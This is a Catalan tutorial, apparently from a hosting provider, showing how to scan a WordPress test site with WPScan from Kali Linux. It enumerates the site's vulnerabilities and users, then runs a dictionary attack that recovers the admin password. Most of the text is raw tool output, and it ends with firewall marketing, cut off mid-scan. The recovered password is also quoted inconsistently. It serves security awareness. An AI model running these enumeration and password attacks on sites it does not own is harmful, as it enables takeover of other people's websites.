La intenció d’aquest tutorial no és més que posar de manifest la importància de mantenir la versió del teu WordPress actualitzada i que sempre disposi d’una capa de Seguretat perimetral addicional que permeti una protecció més enllà del simple WordPress.

Per dur a terme aquest experiment utilitzarem una eina estàndard anomenada Kali, en aquest cas, la versió Live, que ens permetrà arrencar un ordinador amb un USB i començar a treballar.

On puc descarregar Kali?

Per descarregar Kali Live accedeix a la URL https://www.kali.org/downloads/

Seleccionarem, per exemple, la següent versió::

Kali Linux 64 Bit    HTTP | Torrent   

I començarem la descàrrega..

Com arrenco un ordinador amb un USB?

Pots gravar el fitxer que t’has descarregat de Kali en un USB o en un CD. Et detallem com fer-ho:

En Windows

Trobaràs tota la informació necessària a https://www.tecnopeda.com/instalar-kali-linux-live/

En Linux

Simplement executa les ordres des de la teva consola Linux

dd if=kali-linux-2019.1a-amd64.iso of=/dev/sdc bs=8M status=progress oflag=direct

Entenem que /dev/sdc és el dispositiu USB

 

Accedir a Kali i, després?

Després d’arrencar l’ordinador, accediràs a la versió de Linux amb Kali instal·lat a dins.

Ara el següent pas és actualitzar la base de dades de WPScan. Per fer això, escriurem

wpscan –update

A la pantalla veuràs

_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | ‘_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.4.5
Sponsored by Sucuri – https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database …[i] Update completed.

Ja està tot a punt per començar a “hackejar” WordPress

 

Comencem a hackejar?

Primer hem de saber la URL del WordPress que desitgem Hackejar.

Important: No facis això amb un WordPress que no sigui de la teva propietat. Aquest tutorial està fet perquè aprenguis a protegir-te, i per a això hem d’ensenyar-te les vulnerabilitats del teu WordPress. No en facis un mal ús.

La web que provarem nosaltres és: http://pruebadeconcepto.com/

Per fer-ho llançarem la següent ordre:

wpscan –url pruebadeconcepto.com –enumerate

A la pantalla ens apareixerà el següent:

_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | ‘_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.4.5
Sponsored by Sucuri – https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://pruebadeconcepto.com/
[+] Started: Fri Mar 15 10:35:49 2019Interesting Finding(s):

[+] http://pruebadeconcepto.com/
| Interesting Entries:
|  – Server: Apache
|  – Upgrade: h2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  – http://codex.wordpress.org/XML-RPC_Pingback_API
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
|  – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://pruebadeconcepto.com/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|  – https://www.iplocation.net/defend-wordpress-from-ddos
|  – https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.8 identified (Insecure, released on 2017-10-31).
| Detected By: Rss Generator (Passive Detection)
|  – http://pruebadeconcepto.com/?feed=rss2, <generator>https://wordpress.org/?v=4.6.8</generator>
|  – http://pruebadeconcepto.com/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.6.8</generator>
|
| [!] 19 vulnerabilities identified:
|
| [!] Title: WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8966
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8967
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 – HTML Language Attribute Escaping
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8968
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8969
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS)
|     Fixed in: 4.6.10
|     References:
|      – https://wpvulndb.com/vulnerabilities/9006
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
|      – https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
|      – https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
|      – https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 – Application Denial of Service (DoS) (unpatched)
|     References:
|      – https://wpvulndb.com/vulnerabilities/9021
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
|      – https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
|      – https://github.com/quitten/doser.py
|      – https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 – Remove localhost Default
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9053
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 – Use Safe Redirect for Login
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9054
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 – Escape Version in Generator Tag
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9055
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 – Authenticated Arbitrary File Deletion
|     Fixed in: 4.6.12
|     References:
|      – https://wpvulndb.com/vulnerabilities/9100
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
|      – https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
|      – http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
|      – https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
|      – https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
|      – https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 – Authenticated File Delete
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9169
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Authenticated Post Type Bypass
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9170
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 – PHP Object Injection via Meta Data
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9171
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Authenticated Cross-Site Scripting (XSS)
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9172
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Cross-Site Scripting (XSS) that could affect plugins
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9173
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 – User Activation Screen Search Engine Indexing
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9174
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – File Upload to XSS on Apache Web Servers
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9175
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) – Authenticated Code Execution
|     Fixed in: 5.0.1
|     References:
|      – https://wpvulndb.com/vulnerabilities/9222
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
|      – https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
|
| [!] Title: WordPress 3.9-5.1 – Comment Cross-Site Scripting (XSS)
|     Fixed in: 4.6.14
|     References:
|      – https://wpvulndb.com/vulnerabilities/9230
|      – https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
|      – https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
|      – https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentysixteen
| Location: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/
| Last Updated: 2019-02-21T00:00:00.000Z
| Readme: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead …
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Detected By: Style (Passive Detection)
|  – http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8, Match: ‘Version: 1.3’

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations – Time: 00:00:00
<===============================================================================================================================>
(289 / 289) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations – Time: 00:00:02
<===============================================================================================================================>
(2573 / 2573) 100.00% Time: 00:00:02

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups – Time: 00:00:00
<===============================================================================================================================>
(21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports – Time: 00:00:00
<===============================================================================================================================>
(36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to “Plain” for those to be detected)
Brute Forcing Attachment IDs – Time: 00:00:04
<===============================================================================================================================>
(100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs – Time: 00:00:00
<===============================================================================================================================>
(10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] superadmin
| Detected By: Author Posts – Display Name (Passive Detection)
| Confirmed By:
|  Rss Generator (Passive Detection)
|  Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] editor
| Detected By: Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] Finished: Fri Mar 15 10:36:01 2019
[+] Requests Done: 3069
[+] Cached Requests: 7
[+] Data Sent: 691.646 KB
[+] Data Received: 2.383 MB
[+] Memory used: 154.32 MB
[+] Elapsed time: 00:00:11

El que està fent ara el sistema és buscar totes les possibles vulnerabilitats d’aquest WordPress i ensenyar-te-les.

Un cop coneguis les vulnerabilitats del WordPress que vols, podràs iniciar atacs més selectius aprofitant aquestes vulnerabilitats.

Puc arribar a saber el password d’administrador?

Sí, si el WordPress no està correctament protegit podem arribar a obtenir el password de l’usuari administrador.

Amb aquest password i usuari podrem entrar al WordPress i prendre el control total del mateix.

Per aconseguir-lo escriurem el següent:

wpscan –url pruebadeconcepto.com –passwords common_passwds.txt

WPscan començarà a analitzar diferents passwords i sistemes que li permetran realitzar atacs de diccionari o de força bruta contra aquest WordPress

_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | ‘_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.4.5
Sponsored by Sucuri – https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://pruebadeconcepto.com/
[+] Started: Fri Mar 15 10:37:03 2019Interesting Finding(s):

[+] http://pruebadeconcepto.com/
| Interesting Entries:
|  – Server: Apache
|  – Upgrade: h2
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  – http://codex.wordpress.org/XML-RPC_Pingback_API
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
|  – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
|  – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://pruebadeconcepto.com/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://pruebadeconcepto.com/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|  – https://www.iplocation.net/defend-wordpress-from-ddos
|  – https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.8 identified (Insecure, released on 2017-10-31).
| Detected By: Rss Generator (Passive Detection)
|  – http://pruebadeconcepto.com/?feed=rss2, <generator>https://wordpress.org/?v=4.6.8</generator>
|  – http://pruebadeconcepto.com/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.6.8</generator>
|
| [!] 19 vulnerabilities identified:
|
| [!] Title: WordPress 2.8.6-4.9 – Authenticated JavaScript File Upload
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8966
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 – RSS and Atom Feed Escaping
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8967
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 – HTML Language Attribute Escaping
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8968
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 – ‘newbloguser’ Key Weak Hashing
|     Fixed in: 4.6.9
|     References:
|      – https://wpvulndb.com/vulnerabilities/8969
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
|      – https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 – MediaElement Cross-Site Scripting (XSS)
|     Fixed in: 4.6.10
|     References:
|      – https://wpvulndb.com/vulnerabilities/9006
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
|      – https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
|      – https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
|      – https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 – Application Denial of Service (DoS) (unpatched)
|     References:
|      – https://wpvulndb.com/vulnerabilities/9021
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
|      – https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
|      – https://github.com/quitten/doser.py
|      – https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 – Remove localhost Default
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9053
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 – Use Safe Redirect for Login
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9054
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 – Escape Version in Generator Tag
|     Fixed in: 4.6.11
|     References:
|      – https://wpvulndb.com/vulnerabilities/9055
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
|      – https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
|      – https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 – Authenticated Arbitrary File Deletion
|     Fixed in: 4.6.12
|     References:
|      – https://wpvulndb.com/vulnerabilities/9100
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
|      – https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
|      – http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
|      – https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
|      – https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
|      – https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 – Authenticated File Delete
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9169
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Authenticated Post Type Bypass
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9170
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 – PHP Object Injection via Meta Data
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9171
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Authenticated Cross-Site Scripting (XSS)
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9172
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – Cross-Site Scripting (XSS) that could affect plugins
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9173
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 – User Activation Screen Search Engine Indexing
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9174
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 – File Upload to XSS on Apache Web Servers
|     Fixed in: 4.6.13
|     References:
|      – https://wpvulndb.com/vulnerabilities/9175
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
|      – https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|      – https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) – Authenticated Code Execution
|     Fixed in: 5.0.1
|     References:
|      – https://wpvulndb.com/vulnerabilities/9222
|      – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
|      – https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
|
| [!] Title: WordPress 3.9-5.1 – Comment Cross-Site Scripting (XSS)
|     Fixed in: 4.6.14
|     References:
|      – https://wpvulndb.com/vulnerabilities/9230
|      – https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
|      – https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
|      – https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentysixteen
| Location: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/
| Last Updated: 2019-02-21T00:00:00.000Z
| Readme: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead …
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Detected By: Style (Passive Detection)
|  – http://pruebadeconcepto.com/wp-content/themes/twentysixteen/style.css?ver=4.6.8, Match: ‘Version: 1.3’

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups – Time: 00:00:00
<===============================================================================================================================>
(21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs – Time: 00:00:00

<===============================================================================================================================>
(10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] superadmin
| Detected By: Author Posts – Display Name (Passive Detection)
| Confirmed By:
|  Rss Generator (Passive Detection)
|  Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] editor
| Detected By: Author Id Brute Forcing – Author Pattern (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] – superadmin / ContraseñaSuperFuerte23
Trying editor / ContraseñaSuperFuerte23 Time: 00:00:00
<===============================================================================================================================>
(2 / 2) 100.00% Time: 00:00:00

[i] Valid Combinations Found:
| Username: superadmin, Password: ContraseñaSuperFuerte23

[+] Finished: Fri Mar 15 10:37:08 2019
[+] Requests Done: 29
[+] Cached Requests: 50
[+] Data Sent: 6.738 KB
[+] Data Received: 21.675 KB
[+] Memory used: 78.672 MB
[+] Elapsed time: 00:00:04

Un cop acabat el procés veurem com, a part del que s’ha mostrat per pantalla, un missatge semblant a aquest:

[SUCCESS] – superadmin / Contraseña SuperFuerte23

Aquí ens està indicant l’usuari i la contrasenya del WordPress que hem atacat

Usuari: superadmin
Contrasenya: SuperFuerte23

Ja està, ho hem aconseguit, ja podem accedir i controlar aquest WordPress.

Ara, simplement, entrem a l’administrador del WordPress i a partir d’aquí canviem la contrasenya i el WordPress ja és nostre.

http://pruebadeconcepto.com/wp-admin/

 

Molt Important

Insistim que el manual és informatiu i amb la finalitat que coneguis totes les inseguretats del teu WordPress, no perquè en facis un mal ús.

 

Quina seguretat té el teu hosting?

Si has seguit les instruccions d’aquest tutorial sobre el teu WordPress i has aconseguit arribar a obtenir el teu usuari i contrasenya, tens un greu problema.

El teu proveïdor de Hosting no t’està donant una capa de seguretat que et permeti estar tranquil. No ho dubtis ni un moment, has de canviar de proveïdor ràpidament.

Si decideixes fer aquest canvi, analitza primer correctament els serveis de seguretat perimetral que et donin els proveïdors de hosting que estiguis mirant.

Recorda que a SW Hosting donem un filtrat perimetral Anti Hacking de forma gratuïta a tots els nostres plans de Hosting.

 

Què passaria si aquest WordPress estigués a SW Hosting?

En tots els hostings que SW Hosting proporciona incorporem de forma gratuïta una capa de seguretat Anti Hacking.

Aquesta capa de FireWalls de nova generació hauria detectat l’atac que estàs realitzant i ho hauria bloquejat en temps real, impedint a WPScan arribar a realitzar cap tipus d’anàlisi, i, per descomptat, no arribaria a detectar l’usuari i contrasenya del WordPress.

Però no volem deixar-te amb el dubte. Fem el mateix procediment: entrem de nou al nostre Kali i executem la mateixa ordre, però aquesta vegada per verificar un WordPress que està ubicat en un Hosting compartit contractat a SW Hosting.

El primer és que veieu una traça del camí cap al WordPress que vam provar i pugueu veure que es troba ubicat en un Hosting compartit a SW Hosting.

traceroute to pruebadeconcepto.com (81.25.126.103), 30 hops max, 60 byte packets
1  gateway (192.168.2.245)  0.623 ms  0.621 ms  0.604 ms
2  swhosting.com (81.25.112.246)  1.360 ms  1.352 ms  1.338 ms
3  192.168.11.2 (192.168.11.2)  1.326 ms  1.308 ms  1.343 ms
4  192.168.12.2 (192.168.12.2)  1.739 ms  1.720 ms  1.717 ms
5  192.168.12.1 (192.168.12.1)  2.141 ms  2.132 ms  2.163 ms
6  pruebadeconcepto.com (81.25.126.103)  2.915 ms  1.773 ms  1.753 ms

Ara executem la següent ordre::

wpscan –url http://pruebadeconcepto.com/ –passwords passwords.list

I WPScan ens mostra el següent:

_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
